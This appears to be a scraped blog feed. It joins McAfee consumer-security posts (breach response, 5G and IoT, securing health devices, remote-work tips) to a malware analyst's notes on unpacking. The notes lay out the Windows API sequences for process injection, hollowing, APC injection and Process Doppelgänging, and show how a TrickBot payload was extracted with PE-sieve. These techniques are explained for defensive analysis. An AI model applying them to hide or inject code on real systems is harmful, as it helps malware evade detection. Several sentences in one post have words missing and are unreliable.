When library funding measures come up for approval in your community, consider giving them your “yes” voteas they may present an opportunity to fund library locations and services where people can access free broadband. Likewise, give school levies your consideration, they may help get a computer in the hands of a student who doesn’t have one. (An 11% increase in PC, Mac, and Chromebook sales this year was largely driven by the education market, which needed to supply computers for in-home learning.) These are just a couple of ways that we can “think global, act local” and help others get access to a full broadband internet experience. 

So as Thanksgiving approacheslet’s indeed say thanks for the connectivity and internet experience so many of us enjoyand how vital that was this year. Likewise, let’s remember that our country and the communities within it still have a way to go before the overwhelming majority of us can benefit from that same experience—so that they can enjoy and be thankful for it too. 

 Stay Updated  

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.  

The post Thankful for broadband internet, and hopeful for much more   appeared first on McAfee Blogs.

Affected by a Data Breach? Here Are Five Security Steps You Should Take

credit card breach

Five Tips to Secure Your Credit Card Data From This Recent Data Breach

Users share their personal information with companies for multiple reasons. Whether they’re checking into a hotel room, using a credit card to make a purchase at their favorite food spot, or collecting rewards points at a local coffee shop, consumers give companies more access to data than they may realize. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

Dickey’s BBQ Breach

Just this week, for example, cybercriminals were found online to be selling a batch of over three million credit card records – all from cards that were used at Dickey’s BBQ establishments over the past 13-15 months. Researchers stated that Dickey’s payment systems were likely compromised by card-stealing malware, with the highest exposure in California and Arizona. What’s more, financial institutions that have been working with the researchers stated that they have already observed a significant amount of fraud carried out with these cards.

Staying Secure in Light of Data Breaches

If you think you were affected by this breach, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a recent data breach, or just want to take extra precautions:

Keep an eye on your bank account

One of the most effective ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it

Place a fraud alert

If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.

Freeze your credit

Freezing your credit will make it impossible for criminals to take out loans or open new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).

Consider using identity theft protection

A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

Expand your security toolbox

To use your credit card safely online to make purchases, add both a VPN and password manager into your toolbox of security solutions. A VPN keeps your shopping experience private, while a password manager helps you keep track of and protect all your online accounts. And both, luckily, come included in McAfee Total Protection.

Stay Updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Affected by a Data Breach? Here Are Five Security Steps You Should Take appeared first on McAfee Blogs.

5G and the IoT: A Look Ahead at What’s Next for Your Home and Community


5G and the IoT: A Look Ahead at What’s Next for Your Home and Community

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Imagine it’s 20 years ago and someone at a dinner party predicts that one day you could pop down to the appliance store and buy an internet-connected fridge. Your year 2000 self might have shook that off and then then asked, “Why would someone ever do that?”

Yet here we are.

Today, so much is getting connected. Our appliances, security systems, and even our coffeemakers too.  So far this month, we’ve talked about protecting these connected things and securing these new digital frontiers as Internet of Things (IoT) devices transform not only our homes, but businesses and communities as well.

To wrap up Cybersecurity Awareness Month, let’s take a look ahead at how the next wave of connected devices could take shape by taking a look at the network that billions of them will find themselves on: 5G networks.

5G is the key

You’ve no doubt seen plenty of commercials from the big mobile carriers as they tout the rollout of their new, more powerful 5G networks. And more powerful they are. For starters, 5G is expected to operate roughly 10 times faster than the 4G LTE networks many of us enjoy now—with the potential to get yet faster than that over time.

While mention of faster speeds continues to be the top selling point in ads and the like, 5G offers another pair of big benefits: greater bandwidth and lower latency. Taken together, that means 5G networks can host more devices than before and with a near-instantaneous response time.

The implication of these advances is that billions and billions of new devices will connect to mobile networks directly, at terrific speeds, rather than to Wi-Fi networks. Of those, many billions will be IoT devices. And that means more than just phones.

What will those devices look like?

One answer is plenty more of what we’re already starting to see today—such as commercial and industrial devices that track fleet vehicles, open locks on tractor trailer deliveries based on location, monitor heating and air conditioning systems, oversee supply chains. We’ll also see more devices that manage traffic, meter utilities, and connect devices used in healthcare, energy, and agriculture. That’s in addition to the ones we’ll own ourselves, like wearables and even IoT tech in our cars.

All together, we’ll add about 15 billion new IoT devices to the 26 billion IoT devices already in play today for a total of an expected 41 billion IoT devices in 2025.

Securing 5G and the IoT

Citing those examples of IoT applications underscores the critical need for safety and security in the new 5G networks. This is a network we will count on in numerous ways. Businesses will trust their operations to the IoT devices that operate on it. Cities will run their infrastructure on 5G IoT devices. And we, as people, will use 5G networks for everything from entertainment to healthcare. Not only will IoT devices themselves need protection, yet the networks will need to be hardened for protection as well. And you can be certain that increased network security, and security in general, is a part of our future forecast.

The GSMA, an industry group representing more than 750 operators in the mobile space, calls out the inherent need for security for 5G networks in their 5G Reference Guide for Operators. In their words, “New threats will be developed as attackers are provided live service environment to develop their techniques. 5G is the first generation that recognizes this threat and has security at its foundation.” When you consider the multitude of devices and the multitude of applications that will find their way onto 5G, a “square one” emphasis on security makes absolute sense. It’s a must.

While standards and architectures are taking shape and in their first stages of implementation, we can expect operators to put even more stringent defenses in place, like improved encryption, ways of authenticating devices to ensure they’re not malicious, creating secure “slices” of the network, and more, which can all improve security.

Another consideration for security beyond the oncoming flood of emerging devices and services that’ll find their way onto 5G networks is the sheer volume of traffic and data they’ll generate. One estimate puts that figure of 5G traffic at 79.4 zettabytes (ZB) of data in 2025. (What’s a zettabyte? Imagine a 10 followed by 21 zeroes.) This will call for an evolution in security that makes further use of machine learning and AI to curb a similarly increased volume of threats—with technologies much like you see in our McAfee security products today.

The newest IoT devices making their way into your home

“Siri/Alexa/Cortana/Google, play Neko Case I Wish I Was the Moon.”

We’ve all gotten increasingly comfy with the idea of connected devices in our homes, like our smart assistants. Just in 2018, Juniper Research estimated that there’d be some 8 billion digital voice assistants globally by 2023, thanks in large part to things like smart TVs and other devices for the home. Expect to see more IoT devices like those available for use in and around your house.

What shape and form might they take? Aside from the voice-activated variety, plenty of IoT devices will help us automate our homes more and more. For example, you might have smart sensors in your garden that can tell when your tomatoes are thirsty and activate your soaker hoses for a drink—or other smart sensors placed near your water heater that will text you when they detect a leak.

Beyond that, we’re already purchasing connected lights and smart thermostats, yet how about connecting these things all together to create presets for your home? Imagine a setting called “Movie Night,” where just a simple voice command draws the shades, lowers the lights, turns on the gas fireplace, and fires up the popcorn maker. All you need to do is get your slippers.

Next, add in a degree of household AI, which can learn your preferences and habits. Aspects of your home may run themselves and predict things for you, like the fact that you like your coffee piping hot at 5:30am on Tuesdays. Your connected coffeemaker will have it ready for you.

These scenarios were once purely of the George Jetson variety (remember him?), yet more and more people will get to indulge in these comforts and conveniences as the technology becomes more pervasive and affordable.

Technology for All

One point of consideration with any emerging technology like the IoT on 5G is access.

This year drove home a hard reality: access to high-speed internet, whether via mobile device or a home network is no longer a luxury. It’s a utility. Like running water. We need it to work. We need it to study. We need it to bank, shop, and simply get things done.

Yet people in underserved and rural communities in the U.S. still have no access to broadband internet in their homes. Nearly 6 in 10 of U.S. parents with lower incomes say their child may face digital obstacles in schoolwork because of reduced access to devices and quality internet service. And I’ve heard anecdotes from educators about kids taking classes online who have to pull into their school’s parking lot to get proper Wi-Fi, simply because they don’t have a quality connection at home.

The point is this: as these IoT innovations continue to knit their way into our lives and the way the world works, we can’t forget that there’s still a digital divide that will take years of effort, investment, and development before that gap gets closed. And I see us closing that gap in partnership, as people and communities, businesses and governments, all stand to benefit when access to technology increases.

So as we look to the future, my hope is that we all come to see high-speed internet connections for what they are—an absolute essential—and take the steps needed to deliver on it. That’s an advance I’d truly embrace.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.




The post 5G and the IoT: A Look Ahead at What’s Next for Your Home and Community appeared first on McAfee Blogs.

Seven Tips for Protecting Your Internet-Connected Healthcare Devices

Healthcare from Smartphone

Seven Tips for Protecting Your Internet-Connected Healthcare Devices: Cybersecurity Awareness Month

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Fitness trackers worn on the wrist, glucose monitors that test blood sugar without a prick, and connected toothbrushes that let you know when you’ve missed a spot—welcome to internet-connected healthcare. It’s new realm of care with breakthroughs big and small. Some you’ll find in your home, some you’ll find inside your doctor’s office, yet all of them are connected. Which means they all need to be protected. After all, they’re not tracking any old data. They’re tracking our health data, one of the most precious things we own.

What is internet-connected healthcare?

Internet-connected healthcare, also known as connected medicine, is a broad topic. On the consumer side, it covers everything from smart watches that track health data to wireless blood pressure monitors that you can use at home. On the practitioner side, it accounts for technologies ranging from electronic patient records, network-enabled diagnostic devices, remote patient monitoring in the form of wearable devices, apps for therapy, and even small cameras that can be swallowed in the form of a pill to get a view of a patient’s digestive system.

Additionally, it also includes telemedicine visits, where you can get a medical issue diagnosed and treated remotely via your smartphone or computer by way of a video conference or a healthcare provider’s portal—which you can read about more in one of my blogs from earlier this year. In all, big digital changes are taking place in healthcare—a transformation that’s rapidly taking shape to the tune of a global market expected to top USD 534.3 billion by 2025.

Privacy and security in internet-connected healthcare

Advances in digital healthcare have come more slowly compared to other aspects of our lives, such as consumer devices like phones and tablets. Security is a top reason why. Not only must a healthcare device go through a rigorous design and approval process to ensure it’s safe, sound, and effective, it also held to similar rigorous degrees of regulation when it comes to medical data privacy. For example, in the U.S., we have the Health Insurance Portability and Accountability Act of 1996 (HIPAA), which sets privacy and security standards for certain health information.

Taken together, this requires additional development time for any connected medical device or solution, in addition to the time it takes to develop one with the proper efficacy. Healthcare device manufacturers cannot simply move as quickly as, say, a smartphone manufacturer can. And rightfully so.

Seven tips for protecting your internet-connected healthcare devices

However, for this blog, we’ll focus on the home and personal side of the equation, with devices like fitness trackers, glucose monitors, smart watches, and wearable devices in general—connected healthcare devices that more and more of us are purchasing on our own. To be clear, while these devices may not always be categorized as healthcare devices in the strictest (and regulatory) sense, they are gathering your health data, which you should absolutely protect. Here are some straightforward steps you can take:

1) First up, protect your phone

Many medical IoT devices use a smartphone as an interface, and as a means of gathering, storing, and sharing health data. So whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls. Additionally, installing it will protect you and your phone in general as well.

2) Set strong, unique passwords for your medical IoT devices

Some IoT devices have found themselves open to attack because they come with a default username and password—which are often published on the internet. When you purchase any IoT device, set a fresh password using a strong method of password creation.  And keep those passwords safe. Instead of keeping them on a notebook or on sticky notes, consider using a password manager.

3) Use two-factor authentication

You’ve probably come across two-factor authentication while banking, shopping, or logging into any other number of accounts. Using a combination of your username, password, and a security code sent to another device you own (typically a mobile phone) makes it tougher for hackers to crack your device. If your IoT device supports two-factor authentication, use it for extra security.

4) Update your devices regularly

This is vital. Make sure you have the latest updates so that you get the latest functionality from your device. Equally important is that updates often contain security upgrades. If you can set your device to receive automatic updates, do so.

5) Secure your internet router

Your medical IoT device will invariably use your home Wi-Fi network to connect to the internet, just like your other devices. All the data that travels on there is personal and private use already, and that goes double for any health data that passes along it. Make sure you use a strong and unique password. Also change the name of your router so it doesn’t give away your address or identity. One more step is to check that your router is using an encryption method, like WPA2, which will keep your signal secure. You may also want to consider investing in an advanced internet router that has built-in protection, which can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Similar to the above, another way you can further protect the health data you send over the internet is to use a virtual private network, or VPN. A VPN uses an encrypted connection to send and receive data, which shields it from prying eyes. A hacker attempting to eavesdrop on your session will effectively see a mish-mash of garbage data, which helps keep your health data secure.

7) When purchasing, do your research

One recent study found that 25% of U.S. homeowners with broadband internet expect to purchase a new connected consumer health or fitness device within the next year. Just be sure yours is secure. Read up on reviews and comments about the devices you’re interested in, along with news articles about their manufacturers. See what their track record is on security, such as if they’ve exposed data or otherwise left their users open to attack.

Take care of your health, and your health data

Bottom line, when we speak of connected healthcare, we’re ultimately speaking about one of the most personal things you own: your health data. That’s what’s being collected. And that’s what’s being transmitted by your home network. Take these extra measures to protect your devices, data, and yourself as you enjoy the benefits of the connected care you bring into your life and home.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Seven Tips for Protecting Your Internet-Connected Healthcare Devices appeared first on McAfee Blogs.

Stay Connected and Protected During Work, School, and Play

Stay Connected and Protected During Work, School, and Play

These days, work and home mean practically the same thing. Our house is now an office space or a classroom, so that means a lot of our day-to-day happens online. We check emails, attend virtual meetings, help our children distance learn, use social media platforms to check in on our friends and family – our entire lives are digital! This increase in connectivity could mean more exposure to threats – but it doesn’t have to. That’s why this National Cybersecurity Awareness Month (NCSAM) you should learn what it means to be cyber smart.

In our third blog for this NCSAM this year, we examine what that entails. Let’s dive in.

Stay Secure While Working Remote

According to Stanford research, almost twice as many employees work from home than at the office in the U.S. in response to the COVID-19 pandemic. And this new work-from-home economy is probably only going to expand in the future. Your pets and children will continue to make surprise guest appearances on work calls, or you may continue your new job hunt from the kitchen table. But as you work on juggling your work life and personal life at home base, this doesn’t mean that you should have to juggle security threats too.

The new WFH landscape has also brought about increased risk from . Unlike corporate offices – which usually have IT staff responsible for making any necessary network security updates and patches – users’ home network security is in their own hands. This means users must ensure that their Wi-Fi connections are private and locked with a complex password or employ the help of a VPN to prevent hackers from infiltrating your work.

Be Cybersmart While Distance Learning

Work isn’t the only element of consumers’ lives that’s recently changed – school is also being conducted out of many students’ homes as they adapt to distance learning. As a result, parents are now both professionals and teachers, coaching students through new online learning obstacles. But as more students continue their curriculum from home and online activity increases, so does the possibility of exposure to inappropriate content or other threats.

For instance, the transition to distance learning has led to an increase in online students to lose valuable time meant to be spent on their education.

To help ensure that learning from home goes as smoothly as possible, parents must stay updated on the threats that could be lurking around the corner of their children’s online classrooms. Take the time to secure all the devices that power your kids’ learning with a comprehensive security solution.

Enhance Your Streaming Security

Of course, everyone needs to find a balance between work, school, and play! These days, that means scavenging the internet for new content to help keep entertained at home. In fact, according to Nielson, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports. However, causing users to turn to other less secure alternatives such as illegal downloads and links to “free” content riddled with malware. This could open consumers up to a whole host of threats.

Users looking to stream the latest TV show or movie should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

If You Connect It, Protect It

We all need to be cybersmart and aware of the threats that come with our lifestyle changes. By following these pointers, you can block threats from impacting your new day-to-day and ensure security is one less thing to worry about. When looking ahead to the future, incorporate the aforementioned pointers into your digital life so that you are prepared to take on whatever the evolving security landscape brings – now that’s being cybersmart!

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, look out for our other National Cybersecurity Awareness Month blogs, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Stay Connected and Protected During Work, School, and Play appeared first on McAfee Blogs.

How To Unpack Malware: Personal Notes

Nowadays malware authors use a lot of techniques to hide malicious payloads in order to bypass security products and to make malware analyst life harder and fun. There are many tools that you can use to extract content from malware and there is not a standard process, you can use different tools, different techniques and different approaches to solve the same problem.

During this post I am going to quickly describe three (well, actually kind of four) of the main flows that takes me in succeed to unpack malware. But let me repeat that there are many ways to perform such a topic, I simply want to share some personal notes on my favorite flows, without pretending to write a full course material on how to Unpack Malware, which it worth of a full university class.

NB: there is a lot to say about packers, how they are, how they behave, there is much to say even on how many packers family are known, but this is not the place for that. What I am doing here is to mostly focusing on quick shot-cuts useful when you are on rush but not such powerful as debugging the entire process.

Method 0: Just Unpack It, I don’t care more

Well, if you are on rush and you just need to try to unpack a sample as quickest as possible, if you don’t care about what is going on, well Sergei Frankoff (@herrcore) and Sean Wilson (@seanmw) did a great job in releasing Unpac.ME. A web application that tries to unpack your sample, there is a limited free plan for using it, it works most of the times especially with known malware families

Method 1: The quick way

One of the quickest way to simply unpack malware is to try to figure out what packer has been used to pack your sample. Once you have the used packer you just need to run the relative un-packer and that’s it, you have done. Detect it Easy or bettern known as DiE would help you in performing such research. It has a wide signature database tracking hundreds different packers. The following image shows DiE spotting a simple (and very didactic, not really real) UPX packer.

Once you know it has been packed through UPX 3.91, just go and grab the used packer (in such case go to take the relative unpacker and run it against your original sample, you would see a new PE file.

Method 2: The slow but fun way to do !

This is my favorite method since it’s definitely faster than using debug and performing every step by yourself but quite powerful as well getting you the control of many actions happening into memory. Before going into this method you need to know the following main assumptions.

  1. The packer would performs some operations on bytes (read from external file or from the same file or taken from the network) then it will aggregate such a bytes and later on it will pass execution flow (EIP) to those bytes. We call those bytes the “payload“.
  2. Injecting control flows is the main strategy used by packers.
  3. Intercepting the injection flow will abstract us from the used packer

It is now interesting to understand how injection happens on Windows machine. Once we nailed it, we would agree that a quick way to unpack malware is just to grab content from the allocated and injected memory before the main sample (or stub) will make a change of control by passing EIP and Stack to new code.

Main Injection techniques to look for

Fortunately there are not thousands of different possibilities to inject shellcode into memory, so let take a closer look to the main ones. The most used is named process injection.

The process injection schema follows these main steps:

  • OpenProcess – The OpenProcess function returns a handle of an existing process object.
  • VirtualAllocEX – The VirtualAllocEx function is used to allocate the memory and grant the access permissions to the memory address.
  • WriteProcessMemory – The WriteProcessMemory function writes data to an area of memory in a specified process.
  • CreateRemoteThread – The CreateRemoteThread function creates a thread that runs in the virtual address space of another process.
Image from HERE

Another very used technique is the DLL Injection which follows these steps:

  • OpenProcess to Obtain the handle of the target process in which we intend to inject our DLL.
  • Find the address of the LoadLibraryA function using GetProcAddress & GetModuleHandleA functions. LoadLibraryA function is used for loading the DLL into the calling process.
  • VirtualAllocEX to allocate the memory space for the DLL path from where we will be loading the DLL.
  • WriteProcessMemory for writing the DLL path into the allocated memory space.
  • CreateRemoteThread for creating a new thread and passed the address of LoadLibraryA as the start address and the address of the DLL file as the parameter for LoadLibraryA function.
Image from HERE

Process Hollowing is a nice and very used trick to evade endpoint security and to inject control floes. The main idea is to build a suspended process within un-mapped memory. Then replace the un-mapped memory section with the shellcode and later on map and start the process. The steps follows:

  • Create a new target process in suspended state. This can be achieve by passing Create_Suspended value in dwCreationFlags parameter of CreateProcess Windows API.
  • Once the process is created in suspended state we will create a new executable section. It wont be bind to any process. This can be done by using ZwCreateSection function.
  • We need to locate the base address of the target process. This can be done by querying the target process using ZwQueryInformationProcess function. We can find the address of the process environment block (PEB) and then use ReadProcessMemory function to read the PEB. Once the PEB is read ReadProcessMemory function is used once again to locate the entry point from the buffer.
  • We need to bind the section to the target process in order to copy the shellcode in it. To achieve this we need to map the section into current process. This can be done by using ZwMapViewOfSection function and passing handle of the current process by using GetCurrentProcess function.
  • Now we will copy each byte of the shellcode into the mapped section which is created in Step 2.
  • Once the shellcode is copied we can proceed to map the section into the target process. This can be done by using ZwMapViewOfSection function and passing handle of the target process.
  • Once the section is mapped we will locate and construct the patch for the target process so that it can our malicious shellcode instead of the original application code.
  • Once the patch is constructed we will use WriteProcessMemory to write the constructed patch into the target process entry point.
  • After writing the constructed patch to the target process entry point we need to resume the thread. This can be achieve by using ResumeThread function.
Image from HERE

Abusing the Asynchronous Procedure Call (APC) is another way to inject shellcode into processes. The way to exploit this Microsoft functionality follows theses teps:

  • Create a new target process in suspended state. This can be achieve by passing Create_Suspended value in dwCreationFlags parameter of CreateProcess Windows API.
  • Once the process is created obtain the handle of the target process using OpenProcess Windows API.
  • Allocate the memory space for our shellcode in the target process using VirtualAllocEX Windows API.
  • Write the shellcode in the allocated memory space using WriteProcessMemory Windows API.
  • Obtain the handle of the primary thread from the target process using OpenThread Windows API.
  • After obtaining the handle of the thread from the target process we will add a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread using QueueUserAPC Windows API which will point to the memory address of our shellcode.
  • To trigger our shellcode we will resume the suspended thread using ResumeThread Windows API.
Figure from HERE

The last method that I’am going to describe in my personal notes (but there are many more out there) is called: Process Doppelgänging. Quite a recent technique it uses a very little known API for NTFS transactions.

Briefly speaking, we can create a file inside a transaction, and for no other process this file is visible, as long as our transaction is not committed. It can be used to drop and run malicious payloads in an unnoticed way. If we roll back the transaction in an appropriate moment, the operating system behaves like our file was never created.


The process Doppelgänging is a similar technique used to inject control and to evade common AV. It follows these steps:

  • Create a new transaction, using the API CreateTransaction.
  • Create a dummy file to store our payload (CreateFileTransacted).
  • It is used to create a section (a buffer in a special format), which makes a base for our new process.
  • Now it’s time to close it and roll back the transaction (RollbackTransaction).

All these methods are useful to inject payload into memory and to run them keeping a very low rate of detection. Our goal is to intercepts those techniques and to dump the just injected paylaod.

Intercepts these techniques and drop the payload

Now we know the main techniques used by malware to unpack themselves into memory, so we are ready to understand how to hook such functions in order to grab the payload (holding the real behavior). Again there are many techniques to perform that memory extractions, I did change at least 4 workflows until now, but the one I prefer so far is using PE-sieve (download from HERE) to extract injected objects. PE-Sieve is not able to judge the dropped file (are they malicious or not?), so you cannot consider every extracted artifact as a malicious one, you rather need to manually analyze them and express your own assumptions on them.

But let’s start with a practical example. The following image represents a PE file pretending to be a PNG image.

A PE sample pretending to be a .PNG

Looking for sections and import table (IAT) we might observe the samples imports only some of the well-known functions we ‘ve just seen in the previous section (VirtualProtect, GetProcAddress, MoveMemory, etc..) and very often used to unpack malware in memory without touching hard-drive.

Import Table

Even the embedded resources are quite “heavy” which would probably hide some piece of code (??). So … we have a PE file which pretends to be an image, it only imports suspicious functions and it has got a quite heavy resource. Would it be a Malware ?

Looking at resources

Well we do have ideas and suspects but let’s see if it injects pieces of code into the memory and let’s see what they do. Here PE-sieve comes to help us. First of all you need to sacrifice a system :D. Yep, really… you need to run on your target the sample and on the other side you need to run pe-sieve by giving the PID of the suspicious sample. PE-sieve will hook and monitor the previous injection patterns and as soon as it find the right pattern it will drop whatsoever (good files, malicious implant, etc etc) the sample injects. The following image shows the found implants running that sample.

2 Implanted Objects

The dropped files are placed into a directory named with the monitored PID.

Dropped Files

We get some files into that directory. We do have .json report in order to automate results and to wrap them into external projects without using the provided PE-sieve.dll. We have a couple of shellcode (.shc) and three PE. Interesting the 400000.cursor.exe since has 600KB of code and it is executable, and a new ICO different from the original one. Let’s check it’s own property (following image)

Unpacked Property

Now, let’s roll back our scarified VM and run this new file on it. Now let’s check its memory to see if something more is happening there.

Memory from Unpacked one

It looks like we have clear text, no additional encryption/packing stage as shown in memory. We now can follow with classic malware analyses techniques by staging static and dynamic analysis. And, yes, since you are re-scarify your virtual machine, let maximize your effort to grab network traffic and see where it tries to communicate with.

Traffic Analysis

We are facing a nice example of TrickBot version: 1000512 tag: tot793 . The following image shows the same information but coming from the internal systemcall rather then network traces.

Internal Traces

So we nailed it. We’ve just extracted the real payload and later on we figured out it was a TrickBot.

Method 3: The old fashion way (debugger)

Everything can be done from the debugger. You can find the above API patterns by yourself and then follow the System calls and stop and copy whenever you want. you can extract or modify the sample behavior on fly and decide to re-run it as many times you need. Yes, you can, but this would take you a lot of time. Time runs against the economy. More time you need to perform your anlaysis more expensive you are, more expensive you are less customers you could have in both ways: money-wise (expensive = for few ~ cheap = for many) and time-wise (sine you have 24h a day, after that hours you cannot accept more customers). So you would need to mediate between quality/fun and time.

If you are following me since time you would probably remember that I was used to this method years ago, before such a great tools were realized (just few examples: IDA Pro Universal Unpacker or All In Memory CryptoWorm or New way to detect Packers etc..) but today I would not suggest you this method unless you are a student or not a professional Malware analyst.

Tracking PhishingKits for Hunting APT Evolution

Advanced and Persistent Threats are often inoculated by emails or by exploiting exposed vulnerabilities. Since vulnerability exploitation follows specific waves, it depends on vulnerability trends, the email vector become one of the most (ab)used and stable way to inoculate Malicious and unwanted software. A common way to attack victims is to make her open an eMail attachm